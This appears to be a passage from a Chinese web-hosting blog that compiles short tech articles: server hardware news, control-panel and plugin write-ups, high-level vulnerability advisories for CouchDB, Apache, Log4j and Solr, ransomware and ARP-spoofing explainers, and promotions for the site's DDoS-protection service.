双端口25G以太网适配器。Howells写道:“我们研究了更快速的以太网,但我们目前不认为这项技术有利。”这倒不是抨击快速以太网,而是Cloudflare的高度分布式架构让它做出了这个决定。有了该架构,就不需要速度更高、成本也更高的快速以太网技术。新服务器中的一处变化是使用OpenBMC来部署固件。Howells写道:“由于可以访问源代码,我们能够配置BMC功能部件,比如风扇PID控制器、记录和访问BIOS POST代码以及管理网络端口和设备。”“虽然我们目前的BMC是行业标准,但我们认为OpenBMC更适合自己的需求,并为我们带来了优点,比如让我们可以在不依赖供应商的情况下处理上游的安全问题。安全方面的一些机会包括集成所需的身份验证模块、可以使用特定的软件包、利用最新的Linux内核保持版本最新以及控制众多攻击途径。”Howells认为Cloudflare的新服务器是一种改进,而不是第九代服务器与第10代服务器之间的“巨大”变化:从双插槽英特尔服务器变成单核AMD。10代服务器多约29%的请求”。Howells的文章指出,Ampere的Arm服务器也进入了其第11代服务器的最终名单,并承诺在以后的帖子中会透露这些设计的细节。他还写道,他和Cloudflare重视AMD与英特尔之间持续不断的竞争,“我们期待看到英特尔的下一代芯片会有怎样的表现。”英特尔声称,名为Sapphire Rapids的新一代芯片在性能和效率方面实现了跨代飞跃。参考资料:https://blog.cloudflare.com/the-epyc-journey-continues-to-milan-in-cloudflares-11th-generation-edge-server/ #### AMH:非常不错的Linux服务器免费开源控制面板 AMH是一款类似于宝塔面板的产品,支持运行在 CentOS、Ubuntu、Debian 已发行的所有版本。以下是官方介绍: 国内首个开源云主机面板 AMH 是国内首个开源的主机面板,使用APL开源软件协议。 这几年来我们一直致力于创新、完善改进产品与响应用户的需求,我们拥有闪亮的用户口碑。 至今 AMH 系列产品已有十余万次下载安装,相关应用领域也占有国内大部分市场份额。 国内首个弹性云主机面板 AMH 实现平台化架构设计,高可扩展灵活性,所有功能软件可选择定制下载安装。 AMH 支持用户自由弹性组建运行环境与切换环境,您可以下载安装不同版本的WEB服务器、数据库、脚本软件自由组合创建您需要的运行环境。 例如,您可以创建 LNMP、LAMP、LNMH、LNGX、LNAMP等不同WEB应用环境。 (PHP环境支持所有PHP版本共存,包括PHP5.2、5.3、5.4、5.5、5.6、7.0) 国内首个支持组建 SMTP 邮局面板 AMH 支持用户组建完全自主的SMTP企业邮局,无限支持域名邮箱绑定,无限邮局账号限制。 您可自由收发信件,不再需要使用第三方邮件托管服务,保护信件数据隐私,拥有完全灵活自主权。 国内首个支持 PHP7 环境面板 目前PHP重大更新版本PHP7已经上线发布。 PHP7版本运行性能有极大提升,运行速度将是PHP5.6的两倍。 AMH环境软件已经全面支持PHP7运行,您可以轻松创建多套(lNMP/LAMP)PHP版本的环境同时使用。 国内首个支持 HTTP/2 环境面板 AMH面板目前Nginx、Apache新版本都已经更进对HTTP/2支持。 HTTP/2是HTTP/1.x的最新更新优化版本。 HTTP/2加载速度相比旧HTTP/1.x协议有很大的提高(2倍+)。 国内首个支持 Apache2.4 环境面板 AMH 新版本已推出 Apache2.4 的支持,提供运行最新 Apache2.4 版本。 AMH Apache2.4 环境使用更好性能的 event 模式与灵活的 php-fpm 进程管理运行。 AMH 提供所有 PHP 版本支持。 (包括 Apache2.4 不提供支持的 php5.2) 国内首个支持 HHVM 环境面板 HHVM 是 Facebook 开发的执行 PHP 代码的高性能虚拟机。AMH 面板新版本已推出 HHVM 环境支持。 HHVM 具有产生快速代码和即时编译的优点,与有极高的运行性能。   总之AMH是国内非常不错的linux开源控制面板,而且其收费版的价格低于宝塔面板的,有需要的朋友可以下载试试。   官方地址:http://amh.sh/ #### android安卓手机如何运行网络Ping网站IP测试? android手机运行网络Ping测试的方法大致分为两种:一种是系统自带的测试功能,里面包含有ping测试的网络功能。另外一种是下载第三方APP应用来进行相关的PING测试。 方法一:系统自带的手机测试功能。在拨号界面上输入:*#*#4636#*#* ,手机自动进入测试模式。 选择“手机信息” 可以看到“运行ping测试”点击即可ping谷歌的服务器。 方法二:直接下载安装第三方测试应用,应用的名字就叫PING。 应用默认ping的是百度的IP地址,你也可以自己修改ip,应用界面如图。 #### Android被曝新Bug,导致Pixel、一加、小米等设备无响应 近期,大量用户在互联网上报告了一个奇怪的 Android 稳定性错误,此错误会导致整个系统用户界面无法响应 。Android Police 创始人 Artem Russakovskii 首先在其 Pixel 4 XL 上发现了该 bug,并在 Twitter 上与网友进行了交流,以了解问题是否正在影响更多的人。 Another thing that really bothers me on the Pixel 4 XL - when an app freezes up, it oftentimes locks up the whole UI. Notifications, home gesture - everything becomes unresponsive. Sometimes the UI unfreezes when the app does, sometimes the app remains frozen. Anyone else? -Artem Russakovskii(@ArtemR) 2020 年 4 月 17 日 该 bug 表现为,当 APP 出现无响应情况时,整个系统都会受到影响无法进行操作,最后只能采取强制锁屏,再解锁进入的手段。虽然这一 bug 主要集中在使用 Google 内置启动器的 Pixels 上,但部分一加和小米设备也同样受到了影响。 并且,该 bug 出现的频率并不低,在一些用户的设备上,此种情况在一天内可能会多次发生。受影响的应用程序涉及亚马逊、Twitter、YouTube、YouTube 音乐和 Google Play 商店等等。 受影响的设备则主要运行 Android 10,但其中一些也运行 Android 11 Preview,目前还尚不清楚该 bug 是否会影响其他较旧的 Android 版本。Android Police 已经与谷歌取得联系,但是谷歌尚未对此作出回应。 #### Anubis 勒索木马黑客组织:加密 + 永久抹除数据双管齐下,迫使受害者缴纳赎金 6 月 18 日消息,安全公司 Kela 发文,披露了一个名为“Anubis”勒索软件黑客组织,该组织在地下黑客论坛 RAMP 和 XSS 上活跃,广泛招募三类合作伙伴:专责进行勒索软件攻击的团队、专门负责向受害者勒索赎金的团队,以及负责渗透企业网络、寻找初始入侵点的攻击者。这些合作团队之间通过分成利润进行协作,形成了一个分工明确的勒索网络。 安全公司表示,近期该组织在其同名勒索软件中引入了一项“鱼死网破”功能,也就是如果勒索失败,黑客可以直接发动相应功能,彻底清空受害者设备上的文件,即使受害者后续选择支付赎金,相应文件也无法恢复。安全公司认为,黑客旨在用这种功能设计来提升受害方的心理压力,迫使其更有可能选择支付赎金。 相应研究人员指出,虽然此类直接删除受害者文件的功能并非首次出现,但 Anubis 的独特之处在于,它将数据加密与数据抹除两种机制结合在一套攻击流程中,从而令攻击手段更加复杂且难以预防。 据悉,在实际攻击过程中,相应黑客通常通过钓鱼邮件获取目标的初始访问权限,随后执行脚本与命令解释器,利用系统 Token 和进程权限提升技巧规避安全检测,并潜伏在系统中识别出关键进程,继而锁定需要加密的文件与文件夹,并最终发起完整的勒索攻击。 ▲ 遭到黑客加密的文件 研究人员特别提到,当 Anubis 启用其数据抹除功能时,被删除的文件虽然名称和后缀名保持不变,但实际上文件内容已完全清空,文件大小变成“0KB”,形式上看似未变,实则已无法恢复。 ▲ 相应数据抹除功能 ▲ 被抹除后的数据 此类攻击模式的演化,不仅显示出黑客组织在技术与组织结构上的日益成熟,也意味着传统的安全防护手段正面临更大挑战。 #### anylink:把wordpress博客外链自动转换成内部链接的插件 Anylink 是一款链接转换插件,它可以把长链接转换成短链接,也可以将外部链接转换成内部链接,同时还可以隐藏真实的链接地址。Anylink针对搜索引擎进行了专门的SEO处理,可以有效防止网站权重对外传递。同时它不会修改wordpress自带的数据库,也不会修改文章中的任何内容,无论什么时候都不会影响到你数据的完整性。是同类插件中安全性较高、方便灵活的轻量级插件。 自动提取外链内转换——Anylink会自动提取文章中的外链并进行转换,不需要进行额外操作。 不修改任何原始数据——Anylink不会修改任何wordpress数据,这很好地保护了你的数据安全。任何情况下删除该插件均不会留下痕迹。 允许自定义链接样式——默认情况下转换后的链接样式为 http://你的域名/goto/ab12的形式,你可修改跳转目录,把goto修改为任何可用形式。 允许自定义slug样式——slug是指链接后面的小尾巴,你可修改它的样式,如它的长度、组成等等,默认为4位的数字和字母组合。 通话自定义跳转样式——默认情况下使用了307临时转移跳转http状态码,这和你们直接使用一个链接是没有任何区别的,也就是说anylink此种情况下只是修改了链接的样式,其它的均未作修改,比如SEO信息等。不过你可以设置为301、Javascript等等形式。 #### Apache CouchDB 远程代码执行漏洞风险通告(CVE-2022-24706) Apache CouchDB 官方发布安全通告,公告中修复了一个远程代码执行漏洞,漏洞编号CVE-2022-24706。可导致远程攻击者获得管理员权限等危害。为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。漏洞详情Apache CouchDB数据库,它类似于Redis,Cassandra和MongoDB,也是一个NoSQL数据库。 CouchDB将数据存储为非关系性的JSON文档。 这使得CouchDB的用户可以以与现实世界相似的方式来存储数据。 据官方描述,由于CouchDB的默认安装配置存在缺陷,最终可导致攻击者通过访问特定端口,绕过权限校验并获得管理员权限。风险等级高风险漏洞风险攻击者利用该漏洞可导致远程获得管理员权限影响版本CouchDB < 3.2.2 安全版本CouchDB >= 3.2.2 修复建议CouchDB 3.2.2 及更高版本将强制修改默认的 Erlang cookie 值,并将所有 CouchDB 分发端口绑定到 `127.0.0.1` 或 `::1`,来缓解此问题。 请评估业务是否受影响后,酌情升级至安全版本 【备注】:建议您在升级前做好数据备份工作,避免出现意外漏洞参考https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 #### Apache CVE-2021-40438 漏洞预警 漏洞详情地址 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438 漏洞影响版本 小于等于Apache2.4.48 发布时间 2021-9-23 0x01概要 漏洞名称 Apache 2.4.48 ssrf 漏洞 威胁等级 中危 漏洞类型 ssrf 发布日期 9月23日 受影响版本 小于等于Apache 2.4.48 利用条件 设置了反向代理 潜在影响 可以利用此漏洞探测服务器 0x02详细 已知设置了反向代理就可以直接利用。进行ssrf探测服务器其他信息。存在一定的危害 0x03处理建议 1.如果存在反代的业务线。请及时更新版本 2.在线更新方式 第一种方式:软件管理-->更新软件列表-->更新Apache 第二种方式:直接卸载重新安装即可(网站会停止个几分钟) Apache 2.4.51 为安全版本。如果是Apache2.4.51 就不需要更新了。 #### Apache Log4j发布新版2.15.0 解决严重漏洞,为向后兼容,没移除旧功能导致 12 月 12 日消息,近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 目前 Apache Log4j 2.15.0 正式版已发布,安全漏洞 CVE-2021-44228 已得到解决。 根据 Apache 软件基金会 Logging Services 的 PMC 成员 Volkan Yazıcı 的说法,本次的漏洞来自于一个旧功能,但为了保持向后兼容性,就没有移除。 Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。 IT之家获悉,由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 Apache Log4j 2.15.0 正式版地址:点此查看 #### Apache Solr SSRF(服务器端请求伪造漏洞,CVE-2021-27905)POC已公开 CVE-2021-27905的服务器端请求伪造漏洞(SSRF)为高危严重级别,攻击者可以传递特定参数,使服务端发起请求,成功利用该漏洞可造成内网信息探测。目前,CVE-2021-27905漏洞的POC(概念验证)代码已被公开到互联网上。这意味着漏洞利用方法已经公开,黑客利用的风险随之增加。 漏洞描述: 4月13日,腾讯安全发布Apache Solr 多个高危安全漏洞的风险通告,其中编号为CVE-2021-27905的服务器端请求伪造漏洞(SSRF)为高危严重级别,攻击者可以传递特定参数,使服务端发起请求,成功利用该漏洞可造成内网信息探测。   目前,CVE-2021-27905漏洞的POC(概念验证)代码已被公开到互联网上。这意味着漏洞利用方法已经公开,黑客利用的风险随之增加。   Apache Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。   漏洞编号:CVE-2021-27905 漏洞等级:高危   受影响的版本: Apache Solr < 8.8.2   安全版本: Apache Solr = 8.8.2   网络空间测绘: 腾讯安全网络空间测绘结果显示,Apache Solr组件在全球应用分布较广,美国占比最高(34.03%)、其次是中国(11.75%)、德国(10.69%)。在中国大陆地区,浙江、北京、上海、广东四省市位居前列,占比超过82%。 腾讯安全网络空间测绘平台通过空间测绘技术,可针对该类漏洞进行监测与响应,如有需要可联系 es@tencent.com 了解产品详情。 漏洞复现与验证: 腾讯安全专家对公开的漏洞POC进行验证   漏洞修复建议: 腾讯安全专家建议受影响的用户升级到最新版本8.8.2   Apache Solr 8.8.2官方下载地址 https://solr.apache.org/downloads.html   注:修复漏洞前请备份资料,并进行充分测试。   腾讯安全解决方案: 1.腾讯Web应用防火墙(WAF)已支持对Apache Solr SSRF(服务端请求伪造)漏洞(CVE-2021-27905)利用进行检测防护。 2.腾讯主机安全(云镜)漏洞库2021-4-14之后的版本,已支持对Apache Solr SSRF(服务端请求伪造)漏洞(CVE-2021-27905)进行检测。   参考链接: https://www.mail-archive.com/announce@apache.org/msg06482.html #### apache服务器开启百度云加速CDN后如何获取客户真实IP 之前有写过nginx设置真实用户IP的方法,今天我们来查下如何设置apache的,以主机吧宝塔面板为例: 进入软件商店,找到apache设置 配置修改找到,查到LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined 替换成  LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined  保存 然后重启即可。 #### Apache软件基金会迎来22周年 作为一家在开源创新领域有着巨大影响力的非盈利组织,阿帕奇软件基金会(以下简称 ASF)刚刚迎来了该组织的22周岁生日。当地时间3月24日(本周三),350多个开源项目和计划的全职开发者们,在特拉华州威尔明顿市迎来了这个特殊的纪念时刻。 据悉,ASF 旗下拥有350+ 项目和37个面向向公众开放的孵化 Poddle,提供了100% 的免费使用、且不收取任何许可费用。 ASF 官方博客文章指出,这个在世界范围内都首屈一指的纯公益性质的开源软件基金会,已经创造了超过220亿美元的价值。 起初,Apache Group 只有21名创始成员,主要负责当时推出已有3年之久的 Apache HTTP 服务器项目的开发与维护工作。 但是20多年后的今天,ASF 已经成为了世界上最大的、与供应商无关的开源代码基金会。组织中包括了800+ 个人成员和8100+ 提交者,且在每个大洲都有40000+ 代码贡献者。 董事会主席 Sander Striker 表示,过去22年间,ASF 迎来了不断的发展,以满足庞大社区不断增长的使用需求。 基金会汇聚了世界各地的合作者,其开发和管理的项目正在为个人、行业和社区发挥持续的影响力。 通过坚持不懈的努力,秉持公共利益至上理念的 ASF,其提供的软件几乎已经成为了现代计算机领域不可或缺的一部分,并且让全世界数十亿人都受益于此。 社区主导和协作开发的“Apache Way”,更是推动了人工智能、深度学习、大数据、构建管理、云计算、内容交付和管理、边缘计算 / 物联网、金融科技、身份管理,以及各种库、消息传递、移动、搜索、安全性、服务器、Web 框架等类型的各项技术集成与突破性创新。 至于 ASF 孵化器推动的开发项目,则涵盖了人工智能、大数据、区块链、云计算、加密、深度学习、电子邮件、物联网、机器学习、微服务、移动、操作系统、测试、以及可视化等方面的发展。 统计数据表明,已有将近50万人参加了 ASF 的项目和计划,且 ASF 旗下还有官方性质的一系列全球性会议(ApacheCon)。 #### api接口怎么防御? 通常情况下的api接口防护有如下几种: 使用HTTPS防止抓包,使用https至少会给破解者在抓包的时候提高一些难度 接口参数的加解密,通过md5加密数据+时间戳+随机字符串(salt),然后将MD5加密的数据和时间戳、原数据均传到后台,后台规定一个有效时长,如果在该时长内,且解密后的数据与原数据一致,则认为是正常请求;也可以采用aes/des之类的加密算法,还可以加入客户端的本地信息作为判断依据 本地加密混淆,以上提到的加解密数据和算法,不要直接放在本地代码,因为很容易被反编译和破解,建议放到独立模块中去,并且函数名称越混淆越难读越安全。 User-Agent 和 Referer 限制 api防护的登录验证,包括设备验证和用户验证,可以通过检查session等方式来判断用户是否登录 api的访问次数限制,限制其每分钟的api调用次数,可以通过session或者ip来做限制 定期监测,检查日志,侦查异常的接口访问 如不懂技术可直接购买主机吧的高防IP进行防御,高防IP将会依据访问频率、User-Agent、是否重复请求等特性进行CC防护,同时拥有TB级的DDOS防御能力,可最大降低api接口被攻击带来的损失。 详细地址:https://zhujib.com/go/gaofangip #### api接口被恶意攻击怎么办? 如何防止API接口被恶意调用 客户端防护1.客户端双向认证。在app中预置证书(跨平台也是一致的方案),要求更高的话使用专用的证书设备,线下签发,例如银行的U盾。2.客户端双反hook,反调试,防逆向。3.客户端运行环境校验,通过读取硬件信息识别pc还是移动设备以及设备MAC相关信息。传输层防护1.传输协议防护,首先接口建议使用 HTTPS 协议,这样至少会给破解者在抓包的时候提高一些难度。服务端防护1.验证签名与授权信息是否合法,是否失效。2.参数合法性校验,例如时间戳和参数签名校验。过滤一些非法参数。3.数据加密,签名可以采用非对称加密,参数采用对称加密,密匙采用非对称的私匙。4.定时更新签名以及加密信息。5.接口监控,接口的使用设备,使用频率,调用顺序是否合法。6.风控策略防护,有一点作用但是对于有明确指向性的攻击意义不大,IP可以换,频率可以变,很容易就绕过了,策略的设计上要注意尽量少用短命的规则,而且一般只对低级别的对抗有效。7.通过风控平台进行用户行为分析,数据挖掘,然后通过机器学习形成风控模型,对风险进行全方位识别,预警以及管控。 目前市面上很多产品都支持API接口防御,比如主机吧的高防产品也支持API防御,有需要的可以联系主机吧咨询。 #### api防cc攻击的解决办法 最近有站长因为 网站API被攻击,导致业务无法正常使用,找到主机吧帮忙。 像这种API接口攻击危害是非常大的,攻击并不会让你的服务器IP进入黑洞,但是会影响到你的服务器带宽、CPU。 相对于APP防御的话,目前主流的是给APP集成SDK接入,而且些API并不是给APP用的,而且客户也没有APP改造能力。 针对这点主机吧推荐使用高防IP进行防御。 独享节点: 国内 防御峰值:80G CC防御:180000QPS 带宽峰值:50M 主域名:1个 子域名:5个 转发IP:1个 无地域访问限制 国内+海外主机均可防御 支持接入网站+游戏+手机APP业务 月付:2600元 有更高要求可以咨询主机吧,高防IP支持TCP转发、APP、H5、API防御,支持DDOS、CC等安全防御,效果超好。无需任何部署,接入简单快速。 免安装 云端运行机制,将CNAME指向提供的防护域名,防护接入完成。 >>高防IP采用云端运行机制,用户无需在自己的业务服务器安装任何形式的软硬件,只要将网站主机记录的CNAME指向提供的防护 域名,就可以直接享受全部的DDoS防御服务。 集群防护 多个防护节点,通过智能调度,把业务从被攻击节点迁移到防护节点。 >>有多个防护节点,可以通过智能调度系统,把业务无缝的从被攻击节点迁移到其他防护节点。洪水攻击防护 2T清洗带宽,隐藏用户真实IP,确保用户的站点与服务器的安全。 >>现已具备2T总清洗带宽,并持续扩建中,单点防护最高到1T,完美防御SYN Flood、ACK Flood、ICMP Flood、IGMP Flood、Fragment Flood、UDP Flood、NTP Flood 、SSDP Flood、DNS Flood等常见洪水攻击。用户的真实IP被隐藏在防护节点的IP背后,确保用户的站点与服务器随时处于安全状态。CC攻击防护 有效抵御HTTP洪水攻击,慢速攻击,连接耗尽等常见CC攻击。 >>有效抵御HTTP洪水攻击,慢速攻击,连接耗尽等常见CC攻击,通过模式识别、反向验证、访问异常IP封堵等多种手段,精确拦截恶意访问,抵御各类应用层攻击。通过大数据技术,建立正常业务的访问模型和攻击时的防护模型以及IP信誉库,在防御攻击的同时尽可能的降低误拦,保障用户业务不受攻击影响。 接入灵活 支持不同端口业务和接入基于IP方式访问的站点,可深度定制。 >>支持TCP/UDP/HTTP/HTTPS协议,支持不同端口业务,除了支持对域名的防护外,也可接入基于IP方式访问的站点,还可以针对客户业务需求进行深度定制。 #### APNIC向华为分配有史以来最多的IPv6 地址! 近日,亚太网络信息中心(APNIC)的区域性互联网注册机构为华为分配了 2596148429267413814265248164610048 个 IPv6 地址,数量多得惊人。 这天文数字般的海量 IPv6 地址用于 CDN 和云计算,而 APNIC 还需要多出 32 倍的地址来处理请求。 这是 APNIC 有史以来最大规模的一次分配,这家注册机构已向互联网号码分配机构(IANA)申请了 IPv6 地址的第二个 /12 个区块,以满足华为的需求。 /12 区块含有 83076749736557242056487941267521536个地址,多达 830 兆亿,10 兆亿是 1033。华为分配到的地址是 /17 区块,所以只是其中的一小部分。整个 IPv6 数字空间有 2128 个地址——超过 340 千兆亿。1 千兆亿是 1036。由于种种原因,有些地址是保留使用的,有些是使用不切实际的。 这里的数量难以想象的庞大。 而华为分配到的地址数量虽然吓人,但也只是浩瀚的 IPv6 地址海洋中的一滴。 此次分配到的IPV6数量,使得华为可以给每台设备分配一个独立的IPV6 IP,根本不用担心无IP可用,因为华为永远不可能用得完这么多IPV6。 目前我国在大力倡导使用物联网设备,已经有几十亿个联网设备,这些设备每个都分配了独立的IPv6,未计划来几年突破 300 亿个,所以从分配数字来看,即便华为包揽了未来几年国内所有设备使用,华为手中的IPv6也用不完的。 #### APP中的API接口被CC攻击了要怎么防御 如果APP中的接口被CC攻击,可能会导致APP服务崩溃、用户无法正常访问等问题。以下是一些防御CC攻击的方法,供参考: 使用API网关:API网关可以作为一个中间件,拦截所有的请求,从而可以检测到恶意请求并进行拦截。API网关可以根据一些指标来判断恶意请求,例如IP地址、访问频率、请求来源等。 使用流量清洗设备:流量清洗设备可以对流量进行分析和过滤,从而减轻服务器的负载并防御CC攻击。流量清洗设备可以分析流量的特征,识别出恶意流量并进行过滤,同时允许正常的请求通过。 实时监控:实时监控可以帮助你及时发现CC攻击,从而可以及时采取措施。例如,可以使用监控工具来监测服务器的CPU使用率、内存使用率、网络带宽等指标,如果发现异常,则可能是CC攻击,需要及时采取措施。 接口鉴权:可以为接口设置访问权限,只允许经过身份验证的用户访问。例如,可以通过OAuth2.0、JWT等鉴权机制来限制接口的访问,从而减少CC攻击的可能性。 暂时关闭接口:如果APP中的某个接口正在遭受CC攻击,可以暂时关闭该接口,以避免更严重的后果。在关闭接口之前,可以设置一个自动恢复的机制,以便在攻击结束后自动恢复接口的正常运行。 综上所述,如果APP中的接口受到CC攻击,可以使用上述方法进行防御。这些方法可以结合使用,从而提高APP的安全性和可用性。 #### APP为什么会被DDOS攻击与解决办法 主机吧经常接到一些客户说APP被DDOS攻击,导致APP无法正常访问,影响巨大,今天我们就来分析下APP为什么会被DDOS攻击? 1、APP基本都是含有盈利性,某些具有商城交易等性质的APP,如果经营状况很好的情况下,免不了被一些同行业的人眼红,因为人的嫉妒心使然,就导致他剑走偏锋,经过不断的压测攻击,发现没有高防服务,就会进行大流量的网络攻击,使竞争对手的APP平台无法访问,以此来达到打压竞争对手,提高自己平台的访问量。 2、黑客会选择一些盈利性比较好的APP进行攻击,勒索钱财,一般一千到几千不等,如果不给,对方就会对APP进行很长一段时间的DDoS攻击,让你APP一直无法正常访问,一般客户都是选择交钱了事,这里主机吧不建议这样做,因为你一但交钱了,就相当于你是黑客池塘里养的一条鱼,过段时间他还是会再来攻击勒索你要钱的。 3、一种是属于报复性攻击,有一些人通过游戏APP,使其投入了大量资金石沉大海或者是被别有用心的人利用了,就会心生怨恨,为了要出这一口气,就会找人去攻击此APP,使其无法正常访问。还有一些是因为个人心理需要成就感,觉得这件事情好玩或者让自己感觉很有成就,就会不断的去攻击等。 那么APP被DDOS攻击要怎么防御呢? 其实很简单,就是花钱买高防服务器,高防IP,与网站防御不同的是,APP是无法通过百度云加速来进行防御CC攻击的,所以成本要高了许多,以主机吧这边的高防IP为例,最低的60G峰值防御一个月也要1600元,这个成本一年算下来的话也得两万左右了,当然黑客可能不会攻击这么久,一般一两个月看拿不下就放弃了,我们要做的就是顶着对方攻击防御几个月就可以了。   #### APP是怎么防御CC攻击的 最近经常有站长app遭到CC攻击而束手无策,原因是APP防御有别于传统的网站CC防御。 网站防御:会假定客户端是浏览器,当被攻击时会采用重定向方式或者验证码的方式进行验证,这会造成APP无法正常访问。 所以目前APP防御有两种方法: 一种是需要接入防御系统的SDK进行加密防御,这需要对APP进行重新打包; 一种是比较方便的方法访问的客户端是普通APP,受到攻击时不采用重定向或者验证码的方式进行验证,将会依据访问频率、User-Agent、是否重复请求等特性进行防护。 云端运行机制,只需将CNAME指向提供的防护域名,防护接入完成。主机吧的高防IP就是采用这种方式。 了解详细地址:https://zhujib.com/go/gaofangip #### app被特殊CC攻击 一般高防CDN防不住怎么办? 最近有遇到一位站长反馈,自家的APP经常被CC攻击,用了高防服务器、高防CDN、高防IP等都无法进行拦截,请问要如何解决呢? 在了解情况后,我们推荐用户使用我们的高防IP进行拦截,我们的高防IP可针对URL进行单IP请求速率进行限制,可以有效应对特殊CC攻击。 简单的接入高防IP后,成功进行拦截。 总攻击次数高达23059256,还是相当大的。 此次CC攻击峰值高达4万+,由于成功被拦截,攻击者逐步降低了攻击,直至停止攻击。 目前APP稳定运行,有需要的同学可以咨询主机吧购买。 #### Arch Linux遭受DDoS攻击影响服务 过去两周,Arch Linux 项目持续遭受分布式拒绝服务(DDoS)攻击,造成其多项服务中断,用户访问受到影响。该项目维护者 Cristian Heusel 在 8 月 21 日发布的公告中确认了这一情况。 攻击主要影响了 Arch Linux 官方网站、Arch 用户仓库(AUR)以及论坛。AUR 作为用户自发贡献软件包描述和编译脚本的重要平台,是官方软件源的重要补充。此次攻击导致部分用户无法正常访问这些服务。 Heusel 表示团队正在积极应对:“我们深知这对用户造成诸多不便,正与托管服务提供商密切合作,全力缓解攻击带来的影响。我们也在谨慎评估多家 DDoS 防护服务提供商,综合考量成本、安全性和道德标准等多方面因素。” 作为一个依靠志愿者维护的项目,Arch Linux 对社区在应对攻击期间所展现的耐心与支持表示感谢。由于攻击仍在持续,官方暂未公开攻击的具体技术细节、来源及所采用的防护策略。 为提升信息透明度,Arch Linux 将在服务状态页面定期发布事件进展。目前该页面显示,部分服务因防护策略可能会被误报为“下线”状态,但团队正尽力维持服务可用。 针对服务中断的情况,Arch Linux 提供了以下临时解决方案: 若 archlinux.org 无法访问: 镜像列表端点托管于主站,若失效可改用 pacman-mirrorlist 软件包中列出的镜像; 安装镜像可从其他镜像站(如 geomirrors)获取,使用时请务必通过维基介绍的方法验证镜像完整性和 GPG 签名(当前可信密钥为 0x54449A5C)。 若 aur.archlinux.org 无法访问: AUR 软件包已在 GitHub 上提供镜像,用户可通过以下命令克隆具体软件包: git clone --branch <package_name> --single-branch https://github.com/archlinux/aur.git <package_name> #### ARP攻击是什么意思?ARP攻击的起源 ARP攻击的定义 ARP攻击(Address Resolution Protocol Attack),即地址解析协议攻击,是一种网络攻击技术。ARP攻击主要是通过发送假的ARP消息,来破坏网络中数据包正确传输的机制,进而可以窃取信息、中断通信或者使网络资源不可用。 ARP攻击利用了ARP协议的弱点,该协议负责将网络层的IP地址转换为链路层的MAC地址。攻击者通过发送伪造的ARP消息,使得网络设备将流量错误地路由到攻击者指定的目的地,而不是其应有的正常路径。 ARP攻击的起源与发展 ARP攻击在2000年左右首次被广泛关注,当时主要表现为引发IP冲突,随后逐渐演变为更加复杂和隐蔽的攻击方式。ARP攻击的发展历程与网络技术的发展紧密相关,尤其是在交换机和路由器等网络设备越来越普及的背景下。 ARP攻击的实施并不需要直接与目标网络连接,攻击者可以通过监听网络通信,发送伪造的ARP消息,使得网络设备将流量导向攻击者控制的节点。这种攻击方式的成功率取决于网络环境的脆弱性和攻击者的技术能力。 ARP攻击的影响 ARP攻击可能导致网络拥堵、数据泄露、中间人攻击等多种网络安全问题。攻击者可以利用ARP攻击截获、篡改或者拒绝流经的数据包,严重威胁网络通信的安全性和可靠性。 ARP攻击的工作原理 ARP攻击的工作原理涉及几个关键步骤。首先,攻击者会监听网络中的ARP请求和响应,寻找合适的时机插入伪造的ARP消息。这些假消息会使网络设备建立起错误的映射表,将流量导向攻击者控制的节点。一旦建立了这样的映射,所有经过这个网络的流量都将先经过攻击者,这使得攻击者能够拦截、篡改或者丢弃数据包,从而实现攻击的目的。 ARP攻击通常分为以下几个阶段: 信息收集:攻击者通过监听网络通信,获取目标系统的IP地址和MAC地址。 发送伪造ARP:攻击者向网络发送伪造的ARP消息,声称自己是最优路径。 建立映射:网络设备收到伪造的ARP后,会将流量导向攻击者的MAC地址。 实施攻击:攻击者可以截获、修改或拒绝流经的数据包,实现窃取信息、中断通信等目的。 如何防御ARP攻击 防御ARP攻击的常见方法包括: 使用静态ARP:通过配置静态ARP映射,防止动态ARP消息被滥用。 防火墙规则:设置防火墙规则,限制ARP消息的传播,只允许可信任的ARP消息通过。 入侵检测系统:部署入侵检测系统(IDS)和入侵防御系统(IPS),监控网络活动,及时发现并阻止异常的ARP流量。 教育用户:增强用户的安全意识,避免随意点击不明链接或下载来源不明的文件,减少ARP攻击的可能入口。 以上防御措施需要结合实际情况和最新网络安全研究成果不断更新和改进,以确保有效性。 综上所述,ARP攻击是一种复杂的网络攻击方式,它通过发送伪造的ARP消息来破坏正常的网络通信流程。要有效防御这种攻击,需要综合运用多种技术和策略,并及时更新防御措施以应对不断变化的网络环境和攻击手段。 #### Automattic要把Tumblr博客换成WordPress平台 Automattic公司周三宣布了一项重大决策,将把旗下Tumblr平台的全部5亿个博客迁移至基于WordPress的新后端系统。作为WordPress.com和Tumblr的母公司,Automattic此举意在整合两大平台的技术优势,为用户带来更稳定、功能更丰富的博客体验。 Tumblr(中文名:汤博乐)成立于2007年,是目前全球最大的轻博客网站,也是轻博客网站的始祖。Tumblr(汤博乐)是一种介于传统博客和微博之间的全新媒体形态,既注重表达,又注重社交,而且注重个性化设置,成为当前最受年轻人欢迎的社交网站之一。目前全球拥有5亿的多的博客数据。 Tumblr博客换成WordPress平台这个决定进一步提高了WordPress的地位,目前全球80%的博客平台均来自WordPress搭建,连NASA官网都是采用WordPress搭建。 主机帮博客也采用WordPress搭建。 WordPress作为全球最大的开源博客平台,其拥有庞大的用户,生态链非常强大,你不仅可以利用WordPress做博客网站,还可以利用WordPress做各种官网、社交网站等。 #### Avast 杀软内置驱动被黑客利用发动攻击 11 月 26 日消息,安全公司 Trellix 发文,称有黑客借用 Avast 杀软内置的组件作为跳板,以此终止受害者设备中防火墙、EDR 端点安全防护进程,从而控制受害者设备。 据介绍,相关黑客使用名为 kill-floor.exe 